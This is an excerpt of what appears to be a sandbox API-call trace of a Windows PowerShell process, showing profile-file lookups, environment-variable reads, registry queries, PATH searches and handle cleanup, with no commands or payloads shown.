	[0303.112] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b6c3700 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0303.112] CoTaskMemFree (pv=0x1b6c3700) 
	[0303.112] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0303.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0303.113] SetErrorMode (uMode=0x1) returned 0x1
	[0303.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d9e0 | out: lpFileInformation=0x16d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.113] SetErrorMode (uMode=0x1) returned 0x1
	[0303.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0303.113] SetErrorMode (uMode=0x1) returned 0x1
	[0303.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d9e0 | out: lpFileInformation=0x16d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.113] SetErrorMode (uMode=0x1) returned 0x1
	[0303.113] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0303.113] SetErrorMode (uMode=0x1) returned 0x1
	[0303.113] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d9e0 | out: lpFileInformation=0x16d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.113] SetErrorMode (uMode=0x1) returned 0x1
	[0303.113] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0303.113] SetErrorMode (uMode=0x1) returned 0x1
	[0303.114] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16d9e0 | out: lpFileInformation=0x16d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0303.114] SetErrorMode (uMode=0x1) returned 0x1
	[0303.114] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0303.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.114] CoTaskMemFree (pv=0x2ca610) 
	[0303.114] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0303.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.114] CoTaskMemFree (pv=0x2ca610) 
	[0303.115] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0303.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.115] CoTaskMemFree (pv=0x2ca610) 
	[0303.115] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0303.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.115] CoTaskMemFree (pv=0x2ca610) 
	[0303.116] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0303.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.116] CoTaskMemFree (pv=0x2ca610) 
	[0303.117] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0303.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.117] CoTaskMemFree (pv=0x2ca610) 
	[0303.118] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0303.118] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16dbc0 | out: lpMode=0x16dbc0) returned 1
	[0304.314] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0304.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.314] CoTaskMemFree (pv=0x2ca610) 
	[0304.317] SetEvent (hEvent=0x1d0) returned 1
	[0304.317] SetEvent (hEvent=0x2e4) returned 1
	[0304.318] SetEvent (hEvent=0x39c) returned 1
	[0304.318] SetEvent (hEvent=0x1c8) returned 1
	[0304.318] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0304.319] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0304.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.319] CoTaskMemFree (pv=0x2ca610) 
	[0304.320] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d918 | out: phkResult=0x16d918*=0x3a4) returned 0x0
	[0304.320] RegQueryValueExW (in: hKey=0x3a4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16d89c, lpData=0x0, lpcbData=0x16d898*=0x0 | out: lpType=0x16d89c*=0x0, lpData=0x0, lpcbData=0x16d898*=0x0) returned 0x2

Thread:
	id = 46
	os_tid = 0x5dc


Thread:
	id = 47
	os_tid = 0x630


Thread:
	id = 55
	os_tid = 0x444


Thread:
	id = 63
	os_tid = 0x8e0


Thread:
	id = 68
	os_tid = 0x904

	[0241.323] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0270.227] LocalFree (hMem=0x2272c0) returned 0x0
	[0270.227] CloseHandle (hObject=0x320) returned 1
	[0270.227] CloseHandle (hObject=0x13) returned 1
	[0270.228] CloseHandle (hObject=0xf) returned 1
	[0270.228] RegCloseKey (hKey=0x30c) returned 0x0
	[0270.228] RegCloseKey (hKey=0x308) returned 0x0
	[0270.229] RegCloseKey (hKey=0x304) returned 0x0
	[0270.229] LocalFree (hMem=0x227290) returned 0x0
	[0270.229] RegCloseKey (hKey=0x330) returned 0x0
	[0283.161] RegCloseKey (hKey=0x1c8) returned 0x0
	[0292.572] RegCloseKey (hKey=0x390) returned 0x0
	[0292.572] RegCloseKey (hKey=0x38c) returned 0x0
	[0292.572] RegCloseKey (hKey=0x388) returned 0x0
	[0292.573] RegCloseKey (hKey=0x384) returned 0x0
	[0292.573] RegCloseKey (hKey=0x380) returned 0x0
	[0292.573] RegCloseKey (hKey=0x37c) returned 0x0
	[0292.573] RegCloseKey (hKey=0x378) returned 0x0
	[0292.574] RegCloseKey (hKey=0x350) returned 0x0
	[0292.574] RegCloseKey (hKey=0x3ac) returned 0x0
	[0292.574] RegCloseKey (hKey=0x3a8) returned 0x0
	[0292.574] RegCloseKey (hKey=0x370) returned 0x0
	[0292.575] RegCloseKey (hKey=0x36c) returned 0x0
	[0292.575] RegCloseKey (hKey=0x368) returned 0x0
	[0292.575] RegCloseKey (hKey=0x364) returned 0x0
	[0292.575] RegCloseKey (hKey=0x360) returned 0x0
	[0292.576] RegCloseKey (hKey=0x35c) returned 0x0
	[0292.576] RegCloseKey (hKey=0x358) returned 0x0
	[0292.576] RegCloseKey (hKey=0x354) returned 0x0
	[0292.577] RegCloseKey (hKey=0x3a4) returned 0x0
	[0292.577] RegCloseKey (hKey=0x344) returned 0x0
	[0292.577] RegCloseKey (hKey=0x340) returned 0x0
	[0292.577] RegCloseKey (hKey=0x33c) returned 0x0
	[0292.578] RegCloseKey (hKey=0x338) returned 0x0
	[0292.578] RegCloseKey (hKey=0x320) returned 0x0
	[0292.578] RegCloseKey (hKey=0x30c) returned 0x0
	[0292.578] RegCloseKey (hKey=0x308) returned 0x0
	[0292.579] RegCloseKey (hKey=0x304) returned 0x0
	[0292.579] RegCloseKey (hKey=0x3a0) returned 0x0
	[0292.579] RegCloseKey (hKey=0x1d0) returned 0x0
	[0292.579] RegCloseKey (hKey=0x1c8) returned 0x0
	[0292.580] RegCloseKey (hKey=0x39c) returned 0x0
	[0292.580] RegCloseKey (hKey=0x398) returned 0x0
	[0292.580] RegCloseKey (hKey=0x374) returned 0x0
	[0292.580] RegCloseKey (hKey=0x3b0) returned 0x0
	[0641.552] RegCloseKey (hKey=0x3a4) returned 0x0

Thread:
	id = 161
	os_tid = 0x7c8


Thread:
	id = 244
	os_tid = 0xd14

	[0305.265] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0305.268] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0305.272] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.272] CoTaskMemFree (pv=0x2ca610) 
	[0305.274] VirtualQuery (in: lpAddress=0x1c72d7e0, lpBuffer=0x1c72e6a0, dwLength=0x30 | out: lpBuffer=0x1c72e6a0*(BaseAddress=0x1c72d000, AllocationBase=0x1bda0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0305.277] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.277] CoTaskMemFree (pv=0x2ca610) 
	[0305.279] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.279] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.279] CoTaskMemFree (pv=0x2ca610) 
	[0305.282] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.282] CoTaskMemFree (pv=0x2ca610) 
	[0305.296] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.297] CoTaskMemFree (pv=0x2ca610) 
	[0305.299] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.299] CoTaskMemFree (pv=0x2ca610) 
	[0305.300] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.300] CoTaskMemFree (pv=0x2ca610) 
	[0305.305] VirtualQuery (in: lpAddress=0x1c72da90, lpBuffer=0x1c72e950, dwLength=0x30 | out: lpBuffer=0x1c72e950*(BaseAddress=0x1c72d000, AllocationBase=0x1bda0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0305.306] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.306] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.306] CoTaskMemFree (pv=0x2ca610) 
	[0305.308] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.308] CoTaskMemFree (pv=0x2ca610) 
	[0305.308] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.308] CoTaskMemFree (pv=0x2ca610) 
	[0305.310] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0305.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.310] CoTaskMemFree (pv=0x2ca610) 
	[0306.230] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0306.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0306.231] CoTaskMemFree (pv=0x2ca610) 
	[0307.108] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0307.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.108] CoTaskMemFree (pv=0x2ca610) 
	[0307.110] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0307.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.110] CoTaskMemFree (pv=0x2ca610) 
	[0307.111] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0307.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.111] CoTaskMemFree (pv=0x2ca610) 
	[0307.113] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0307.113] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.114] CoTaskMemFree (pv=0x2ca610) 
	[0307.115] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0307.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.115] CoTaskMemFree (pv=0x2ca610) 
	[0307.116] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0307.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.116] CoTaskMemFree (pv=0x2ca610) 
	[0307.117] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0307.117] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.117] CoTaskMemFree (pv=0x2ca610) 
	[0307.132] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0307.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.132] CoTaskMemFree (pv=0x2ca610) 
	[0311.624] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0311.624] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0311.624] CoTaskMemFree (pv=0x2ca610) 
	[0312.777] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0312.778] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0312.778] CoTaskMemFree (pv=0x2ca610) 
	[0312.778] CoTaskMemAlloc (cb=0x128) returned 0x287130
	[0312.778] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x287130, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0312.778] CoTaskMemFree (pv=0x287130) 
	[0315.720] CoTaskMemAlloc (cb=0x20e) returned 0x1b6c5370
	[0315.720] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b6c5370 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0315.720] CoTaskMemFree (pv=0x1b6c5370) 
	[0316.172] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0316.173] SetErrorMode (uMode=0x1) returned 0x1
	[0316.176] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.857] SetErrorMode (uMode=0x1) returned 0x1
	[0324.327] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.328] SetErrorMode (uMode=0x1) returned 0x1
	[0324.328] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.336] SetErrorMode (uMode=0x1) returned 0x1
	[0324.337] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.338] SetErrorMode (uMode=0x1) returned 0x1
	[0324.338] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.346] SetErrorMode (uMode=0x1) returned 0x1
	[0324.348] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.348] SetErrorMode (uMode=0x1) returned 0x1
	[0324.348] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.356] SetErrorMode (uMode=0x1) returned 0x1
	[0324.358] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.358] SetErrorMode (uMode=0x1) returned 0x1
	[0324.358] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.163] SetErrorMode (uMode=0x1) returned 0x1
	[0325.164] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.164] SetErrorMode (uMode=0x1) returned 0x1
	[0325.165] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.173] SetErrorMode (uMode=0x1) returned 0x1
	[0325.175] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.175] SetErrorMode (uMode=0x1) returned 0x1
	[0325.175] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.184] SetErrorMode (uMode=0x1) returned 0x1
	[0325.186] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.186] SetErrorMode (uMode=0x1) returned 0x1
	[0325.186] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c72d9c0 | out: lpFindFileData=0x1c72d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.194] SetErrorMode (uMode=0x1) returned 0x1
	[0325.196] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c72d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.196] SetErrorMode (uMode=0x1) returned 0x1
